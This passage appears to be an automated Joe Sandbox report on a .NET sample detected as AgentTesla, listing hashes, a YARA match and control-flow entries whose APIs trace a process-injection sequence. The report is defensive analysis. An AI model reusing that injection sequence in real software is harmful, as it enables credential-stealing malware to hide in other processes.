                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              Imagebase:0xf20000
                                                                                                                              File size:1825280 bytes
                                                                                                                              MD5 hash:2DDEC3A033A6DED2EC135BB2F3EC897D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security


                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:153
                                                                                                                                Total number of Limit Nodes:6

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F$G$H$J
                                                                                                                                • API String ID: 0-4200722813
                                                                                                                                • Opcode ID: 70503fa80724cd7f3731f5ba4475dfc2119d5bc69d528b060d0daf88bd468c9d
                                                                                                                                • Instruction ID: ea706dbd8bcdcee219c6488b8e648fba821c62b3af1a82d8064454d039f645ab
                                                                                                                                • Opcode Fuzzy Hash: 70503fa80724cd7f3731f5ba4475dfc2119d5bc69d528b060d0daf88bd468c9d
                                                                                                                                • Instruction Fuzzy Hash: 4B8128B4D06209CFCB04CFA9D885AEDBBB6FF4A310F149269D416AB394C7349942DF94
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$H
                                                                                                                                • API String ID: 0-1298621336
                                                                                                                                • Opcode ID: cde310bb81c99884ae070783a5746e20b5b5240051e50d07e89c7df2318fcace
                                                                                                                                • Instruction ID: 3b778ef9dbc7a9cb36978fb5611d189f0feedaf8b9e8a7c947ed73ed936f25bc
                                                                                                                                • Opcode Fuzzy Hash: cde310bb81c99884ae070783a5746e20b5b5240051e50d07e89c7df2318fcace
                                                                                                                                • Instruction Fuzzy Hash: D4B10570D0B208CBDF10CFB9D648BEEBBB6BB4A316F105119D419AB291DBB55946CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                 [Control-flow graph image not reproduced: function entry block 56e4a72-56e4a9a, basic blocks spanning 56e4a72-56e4ebb, with calls to 56e4fa8 and 56e4f99]
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$H
                                                                                                                                • API String ID: 0-1298621336
                                                                                                                                • Opcode ID: df7ee1fd0d3e6f3079047c471c03e77a0398432fadbfffb826577b6fff6e064d
                                                                                                                                • Instruction ID: ce302422795ca2de608d0537c430bec5900beb33ac42f86b8418f204c74227db
                                                                                                                                • Opcode Fuzzy Hash: df7ee1fd0d3e6f3079047c471c03e77a0398432fadbfffb826577b6fff6e064d
                                                                                                                                • Instruction Fuzzy Hash: 91A13570D0B208CFDF10CFA9D548BEEBBB6BB4A316F109129D419AB291DBB55946CF04
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E53FF
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5444
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E54AF
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E54F9
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5539
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E557F
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E55C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 59df3355891f0143b38a0a5e0b06f53e74566e1d0007027a5faafcbf06712c02
                                                                                                                                • Instruction ID: 399f6b7cf0fa60619a5971d4122776b23cce5c9a4e0216d6e600351ff8aef679
                                                                                                                                • Opcode Fuzzy Hash: 59df3355891f0143b38a0a5e0b06f53e74566e1d0007027a5faafcbf06712c02
                                                                                                                                • Instruction Fuzzy Hash: 618118B4D06208DFDB10CFA8E58879CFBF1AB18319F24810AE85AB7750D7795985CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                 [Control-flow graph image not reproduced: function entry block 56e5383-56e5390, basic blocks spanning 56e5355-56e5644, with RtlDecodePointer and RtlEncodePointer calls as listed under APIs]
                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E53FF
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5444
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E54AF
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E54F9
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5539
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E557F
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E55C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 978fb388cb1e187ad4691465df0002a6c11c454e5503e7091b69aff907dec235
                                                                                                                                • Instruction ID: 467d97f93c21d0f4555acad6dd3231b5b4d8dfbd14d482e4a3162ad3a830d742
                                                                                                                                • Opcode Fuzzy Hash: 978fb388cb1e187ad4691465df0002a6c11c454e5503e7091b69aff907dec235
                                                                                                                                • Instruction Fuzzy Hash: 21813A70D06348DFDB11CFA8D58878CBFF1AB28319F24814AE84AA7750D7794885CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                 [Control-flow graph image not reproduced: function entry block 11a2909-11a2958, basic blocks spanning 11a2909-11a29d9, with calls to 11a2740, 11a2798 and RtlEncodePointer]
                                                                                                                                APIs
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 011A298D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_11a0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID: [>9[>9
                                                                                                                                • API String ID: 2118026453-3003199868
                                                                                                                                • Opcode ID: 9fc6a6eb9423d2755c35fd738f9cdc847663cfc0621b002f1ff0f7977f61bd1d
                                                                                                                                • Instruction ID: 8b44f1e05d03e762fd61bb67820fcbac88463503389a0a8ac936d393e86655d1
                                                                                                                                • Opcode Fuzzy Hash: 9fc6a6eb9423d2755c35fd738f9cdc847663cfc0621b002f1ff0f7977f61bd1d
                                                                                                                                • Instruction Fuzzy Hash: F7219AB59003598FDB60CFA9D9487DEBFF4EB18314F208429D449B3600E379A649CFA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                 [Control-flow graph image not reproduced: function entry block 56e1e58-56e1eed, basic blocks spanning 56e1e58-56e219d, with a CreateProcessA call in block 56e1fe7-56e20a1]
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056E208E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: bb89e4b2c0b0965e28eb4e932f12d77cf4a7f45b3f8463c9bf2ebeb0f349f7ab
                                                                                                                                • Instruction ID: aba8ef903008bf1b5c9f395c8a260396df00de3817aa436f0f0f04e692ca9c59
                                                                                                                                • Opcode Fuzzy Hash: bb89e4b2c0b0965e28eb4e932f12d77cf4a7f45b3f8463c9bf2ebeb0f349f7ab
                                                                                                                                • Instruction Fuzzy Hash: 94914C71D01219DFDB10CFA8C885BEDBBF2BB49314F1485A9E819A7380DB749A85CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                 [Control-flow graph image not reproduced: function entry block 56e1caa-56e1cfe, basic blocks spanning 56e1caa-56e1d86, with a WriteProcessMemory call in block 56e1d0e-56e1d4d]
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056E1D40
                                                                                                                                Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 0a44f9a6321abed2ac2b147850ac50dfe384b83dcfe84d53bf956e4f7ba1a1b9
• Instruction ID: ad54a303c6e6029346d5d838517afc848d8ee99fe377f0f0b120b89756855631
• Opcode Fuzzy Hash: 0a44f9a6321abed2ac2b147850ac50dfe384b83dcfe84d53bf956e4f7ba1a1b9
• Instruction Fuzzy Hash: 302148719013099FCB10CFA9C8807DEBBF5FF48314F50842AE959A7640D778A940CBA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Nodes: 490 [56e1cb0-56e1cfe]; 492 [56e1d0e-56e1d4d, WriteProcessMemory]; 493 [56e1d00-56e1d0c]; 495 [56e1d4f-56e1d55]; 496 [56e1d56-56e1d86]
• Edges: 490->492, 490->493, 493->492, 492->495, 492->496, 495->496
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 056E1D40
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: fdc1e3ef8a3f33a00ebe0473d1ebaa284365f8c6f42d1ca8a3273e8b06da2980
• Instruction ID: 97de14fb2cce6c2c77adab1154dcab93cf9fbd50115f680de255dfdd55d7275e
• Opcode Fuzzy Hash: fdc1e3ef8a3f33a00ebe0473d1ebaa284365f8c6f42d1ca8a3273e8b06da2980
• Instruction Fuzzy Hash: BA2127719013199FCB10CFAAC884BDEBBF5FF48314F10842AE959A7240D778A944DBA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Nodes: 500 [56e2290-56e2325, ReadProcessMemory]; 504 [56e232e-56e235e]; 505 [56e2327-56e232d]
• Edges: 500->504, 500->505, 505->504
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056E2318
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: f0bb42b1c62323c20c8f2e232bd005804b04cbfe7051cd7cd815dede39136e54
• Instruction ID: 24aefd4cd5265a06123be9480e8a644b465b3066f458cf5d644e2af3088a235f
• Opcode Fuzzy Hash: f0bb42b1c62323c20c8f2e232bd005804b04cbfe7051cd7cd815dede39136e54
• Instruction Fuzzy Hash: DC214AB18003099FCB00DFAAC8807DEBBF5FF48320F50842AE558A7240D778A941CFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Nodes: 509 [56e1b12-56e1b63]; 512 [56e1b65-56e1b71]; 513 [56e1b73-56e1ba3, SetThreadContext]; 515 [56e1bac-56e1bdc]; 516 [56e1ba5-56e1bab]
• Edges: 509->512, 509->513, 512->513, 513->515, 513->516, 516->515
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 056E1B96
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: 2005b301efc4494184c5c0168f8b5813c3da8ba07d2264894d23cd628ca28a1d
• Instruction ID: 3daba27bc966bad842cd94808710468ee08d831aa1c4c64d4ccb26ff3f7f9b1b
• Opcode Fuzzy Hash: 2005b301efc4494184c5c0168f8b5813c3da8ba07d2264894d23cd628ca28a1d
• Instruction Fuzzy Hash: 9D213771D003099FCB10DFAAC4847EEBBF4EF99324F54842AD459A7640DB78A945CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Nodes: 520 [56e1b18-56e1b63]; 522 [56e1b65-56e1b71]; 523 [56e1b73-56e1ba3, SetThreadContext]; 525 [56e1bac-56e1bdc]; 526 [56e1ba5-56e1bab]
• Edges: 520->522, 520->523, 522->523, 523->525, 523->526, 526->525
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 056E1B96
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: 1ba16e9fc175c692d693f200e0586a92541a451df81d64e017f34e57206df278
• Instruction ID: 46e0ab1d8dcf404b4ee63423378e943fdd02b6f374577963399da4b8696eb0fc
• Opcode Fuzzy Hash: 1ba16e9fc175c692d693f200e0586a92541a451df81d64e017f34e57206df278
• Instruction Fuzzy Hash: 18213571D003098FCB10DFAAC4847EEBBF4EF88324F54842AD459A7640DB78A945CFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Nodes: 530 [56e2298-56e2325, ReadProcessMemory]; 533 [56e232e-56e235e]; 534 [56e2327-56e232d]
• Edges: 530->533, 530->534, 534->533
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056E2318
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: b74a46d01178bf3a60eb4707328553508685e33949c40f88606554536f0c1be6
• Instruction ID: 7c05ccc4628a3f0e9d6c2050e28817d574e0a3565d7df470bef29c73948053c9
• Opcode Fuzzy Hash: b74a46d01178bf3a60eb4707328553508685e33949c40f88606554536f0c1be6
• Instruction Fuzzy Hash: 71212AB18013199FCB10DFAAC8806DEBBF5FF48310F50842AE519A7240D7789944CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 011A26E2
Memory Dump Source
• Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_11a0000_file.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: 6bcdc300a38b12c1cfbd6e22622f06b16dac128f687f7d7e9ce2d2ee5d3c0533
• Instruction ID: f15d9dbb7b2905b3b204cc8d85408692f123a87ae6d27ca2e72f32fdc0223d0b
• Opcode Fuzzy Hash: 6bcdc300a38b12c1cfbd6e22622f06b16dac128f687f7d7e9ce2d2ee5d3c0533
• Instruction Fuzzy Hash: BF216AB6901305CFDB51DFA9D64838EBFF4FB48324F608429D849AB640E7786545CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056E1C5E
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 81a3485291c1455c862dcf9b7f12b0d55e290830e58e7c11ec3f1988d5c0d291
• Instruction ID: 637a22fd45a149bfb335a65fdac25844c7cc7e3fc7fa6bef94f16c4d53877260
• Opcode Fuzzy Hash: 81a3485291c1455c862dcf9b7f12b0d55e290830e58e7c11ec3f1988d5c0d291
• Instruction Fuzzy Hash: B51126729002099FCB10DFAAC844AEFBFF5EF98324F14842AE555B7650D779A950CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlEncodePointer.NTDLL(00000000), ref: 011A26E2
Memory Dump Source
• Source File: 00000000.00000002.385497312.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_11a0000_file.jbxd
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
• Opcode ID: 2ef99b3caec5e0783890a9f5e6d357d8a602a7a8967ac011f87c22003972b0ae
• Instruction ID: 51f06fd05fb7366dbf057b32f84f01a7018d0d993af13000323c1848214866ff
• Opcode Fuzzy Hash: 2ef99b3caec5e0783890a9f5e6d357d8a602a7a8967ac011f87c22003972b0ae
• Instruction Fuzzy Hash: 45117CB69013098FDB60DF9AD5487DEBFF4FB44324F608029D809A7640E7786545CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056E1C5E
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: e29232d556a313d60a94d464c10b46a38b68af27e383957521c8667c2312de4b
• Instruction ID: cb138b7031cb3fe84f019b4bac299e0751000940b9ece66701202a2760985888
• Opcode Fuzzy Hash: e29232d556a313d60a94d464c10b46a38b68af27e383957521c8667c2312de4b
• Instruction Fuzzy Hash: 7F1137719002099FCB10DFAAC844AEFBFF5EF88324F14841AE515B7250C779A940CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 033314f131028a4b42fb10598d06e470b2d21fe2f8a197533f22f89a756c78b6
• Instruction ID: ee2077f61474fbd3de70e4d4ecf846361a48f501aab7e350957fd6f40be32015
• Opcode Fuzzy Hash: 033314f131028a4b42fb10598d06e470b2d21fe2f8a197533f22f89a756c78b6
• Instruction Fuzzy Hash: 9F115B719003098BCB10DFAAC4457EFBBF4EB88324F148429D415B7640CB78A944CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_56e0000_file.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 3d12effb1edf5f5ff5af0f211a9d87351bf04b566a78b5d0e004b790cb2e77d8
• Instruction ID: 7699feb9483d0bb61afef732fecb70f54188cd1d2857d3618c92b18b7d1eb2f1
• Opcode Fuzzy Hash: 3d12effb1edf5f5ff5af0f211a9d87351bf04b566a78b5d0e004b790cb2e77d8
• Instruction Fuzzy Hash: 93113AB1D003098BCB10DFAAC4457EFFBF9EF88324F14841AD519A7640DB78A944CBA4
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 51bcce0137274a0d01eb4de7746ea6992d74c1f42b082da18c750694283ef882
                                                                                                                                • Instruction ID: be2d319001a0d070045efb37fa5729a645fefd15f8d9ff330870c6ca786c6b4a
                                                                                                                                • Opcode Fuzzy Hash: 51bcce0137274a0d01eb4de7746ea6992d74c1f42b082da18c750694283ef882
                                                                                                                                • Instruction Fuzzy Hash: 9B316C75D06628CBEB68CF2BC815799BAF7AFC9300F14C1BA840DA6254DB740A86CF55
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 658e152efd754b56bb0f7d8ba581690d8b636b2319857d76fb888d87e8735af7
                                                                                                                                • Instruction ID: fe8f4391b81ae2a3309ed5805af75f023adf55b94f4b76c856f7eac7687c2ee1
                                                                                                                                • Opcode Fuzzy Hash: 658e152efd754b56bb0f7d8ba581690d8b636b2319857d76fb888d87e8735af7
                                                                                                                                • Instruction Fuzzy Hash: 8B21AF75D156288BEB68CF2B8C45799FBF7AFC8200F14C1F9881CA6214EA3009868F50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5AD7
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5B1C
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5B87
                                                                                                                                • RtlDecodePointer.NTDLL(-000000FC), ref: 056E5BD1
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5C11
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5C57
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5C9B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: b15667a3885becc9297bd48479d8b4b73095ffb42ea375c6180aa109f325de18
                                                                                                                                • Instruction ID: bdb7fa5f98c1ca4b36a2760ea732638aae91dad5356845cd601e86ab819268a9
                                                                                                                                • Opcode Fuzzy Hash: b15667a3885becc9297bd48479d8b4b73095ffb42ea375c6180aa109f325de18
                                                                                                                                • Instruction Fuzzy Hash: D681E474C062489FDB10CFA8E19979CFBF5BB28318F24814AE85AB7790C7795885CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E576C
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E57AB
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5812
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E584E
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5888
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E58C8
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5906
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: d7c24e8ec7f06ae0d16028d95f81d0945e6cf82ac8449caeca1b9875d66a89fe
                                                                                                                                • Instruction ID: 5b521ac2577c67bfe595a065aed480ea122753a45523fecb4e90e585625385ba
                                                                                                                                • Opcode Fuzzy Hash: d7c24e8ec7f06ae0d16028d95f81d0945e6cf82ac8449caeca1b9875d66a89fe
                                                                                                                                • Instruction Fuzzy Hash: F5613AB1C06359CFDB619F9AC48C3DEBBF0BB18319F108519D46A67680D7781585CFA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E44
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5E83
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5EEA
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E5F26
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5F60
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FA0
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E5FDE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.390569966.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_56e0000_file.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$Decode$Encode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1638560559-0
                                                                                                                                • Opcode ID: 7c9233b84e859242e9e861ba6d4a9ab5913f1da2a776641cb3606ab20cf36615
                                                                                                                                • Instruction ID: 0b10a1e5d3767b27b542497a42498d4976eebb4f6a68140aebcfbc67267f505e
                                                                                                                                • Opcode Fuzzy Hash: 7c9233b84e859242e9e861ba6d4a9ab5913f1da2a776641cb3606ab20cf36615
                                                                                                                                • Instruction Fuzzy Hash: B06136B0C063598FDF21CFA9D54879EBFF4BB28319F14850AE45AA7A80C3785585CF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E576C
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E57AB
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5812
                                                                                                                                • RtlDecodePointer.NTDLL(00000000), ref: 056E584E
                                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 056E5888
                                                                                                                                • RtlDecodePointer.NTDLL ref: 056E58C8
